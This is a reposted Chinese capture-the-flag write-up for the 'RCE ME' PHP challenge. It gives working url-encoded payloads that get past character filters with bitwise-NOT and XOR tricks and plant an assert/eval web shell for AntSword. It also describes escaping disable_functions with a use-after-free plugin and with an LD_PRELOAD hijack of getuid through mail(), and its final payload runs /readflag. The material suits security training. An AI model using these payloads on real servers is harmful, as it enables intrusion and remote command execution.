[极客大挑战 2019]RCE ME
linux php -r,Linux中php命令起什么作用呢?_冬瓜Don的博客-CSDN博客
-r:运行PHP代码,而无需使用脚本标记“..?>”
浅谈PHP代码执行中出现过滤限制的绕过执行方法_末初mochu7的博客-CSDN博客_php代码执行绕过
BUUCTF:[极客大挑战 2019]RCE ME_末初mochu7的博客-CSDN博客
[极客大挑战 2019]RCE ME_浩歌已行的博客-CSDN博客
取反绕过
要求PHP>=7
php -r "echo urlencode(~'phpinfo');"
php5,php7 phpinfo();
php7 (phpinfo)();
?code=(~%8F%97%8F%96%91%99%90)();
禁用了system等函数,无法执行命令,用assert写马
assert
检查一个断言是否为false
assert()会检查指定的assertion并在结果为false时采取适当的行动。在PHP5或PHP7中,如果assertion是字符串,它将会被assert()当做PHP代码来执行。
php -r "echo urlencode(~'(eval($_POST["aaa"]))');"php -r "echo urlencode(~'assert');"
?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9E%A2%D6%D6);蚁剑连接
flag无读取权限,但是有readflag文件可以读取flag,还禁用了函数,这里无法执行readflag
0400为其他人的读权限 linux chmod命令参数及用法详解-文件文件夹权限设定命令_sswqzx的博客-CSDN博客_chmod 参数
异或绕过
字符:? ASCII码:63 二进制: 0011 1111字符:~ ASCII码:126 二进制: 0111 1110异或规则:1 XOR 0 = 10 XOR 1 = 10 XOR 0 = 01 XOR 1 = 0上述两个字符异或得到 二进制: 0100 0001该二进制的十进制也就是:65对应的ASCII码是:A去找了个php脚本来计算
payload:
${%ff%ff%ff%ff^%a0%b8%ba%ab}{%aa}();&%aa=phpinfo// ${_GET}{%aa}();&%aa=phpinfo//phpinfo();
写马
?code=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%aa}(${%ff%ff%ff%ff^%a0%b8%ba%ab}{%bb});&%aa=assert&%bb=eval($_POST[a])//assert(eval($_POST[a]));蚁剑
AntSword插件绕过Disable_functions
打开插件市场下载就行
选择 PHP7_GC_UAF
开始后就可以运行readfile文件了
利用linux提供的LD_preload环境变量
劫持共享so,在启动子进程的时候,新的子进程会加载我们恶意的so拓展,然后我们可以在so里面定义同名函数,即可劫持API调用,成功RCE
一般而言,利用漏洞控制 web 启动新进程 a.bin(即便进程名无法让我随意指定),a.bin 内部调用系统函数 b(),b() 位于系统共享对象 c.so 中,所以系统为该进程加载共 c.so,想法在 c.so 前优先加载可控的 c_evil.so,c_evil.so 内含与 b() 同名的恶意函数,由于 c_evil.so 优先级较高,所以,a.bin 将调用到 c_evil.so 内 b() 而非系统的 c.so 内 b(),同时,c_evil.so 可控,达到执行恶意代码的目的。基于这一思路,常见突破 disable_functions 限制执行操作系统命令的方式为:
- 编写一个原型为 uid_t getuid(void); 的 C 函数,内部执行攻击者指定的代码,并编译成共享对象 getuid_shadow.so;
- 运行 PHP 函数 putenv(),设定环境变量 LD_PRELOAD 为 getuid_shadow.so,以便后续启动新进程时优先加载该共享对象;
- 运行 PHP 的 mail() 函数,mail() 内部启动新进程 /usr/sbin/sendmail,由于上一步 LD_PRELOAD 的作用,sendmail 调用的系统函数 getuid() 被优先级更好的 getuid_shadow.so 中的同名 getuid() 所劫持;
- 达到不调用 PHP 的各种命令执行函数(system()、exec() 等等)仍可执行系统命令的目的。
上传马和对象到/var/tmp
payload:
?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[%aa](${%fe%fe%fe%fe^%a1%b9%bb%aa}[%bb]);&%aa=assert&%bb=include(%27/var/tmp/bypass_disablefunc.php%27)&cmd=/readflag&outpath=/tmp/tmpfile&sopath=/var/tmp/bypass_disablefunc_x64.so//?code=assert(include('/var/tmp/bypass_disablefunc.php'));&cmd=/readflag&outpath=/tmp/tmpfile&sopath=/var/tmp/bypass_disablefunc_x64.so
来源地址:https://blog.csdn.net/m0_63253040/article/details/127046574
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
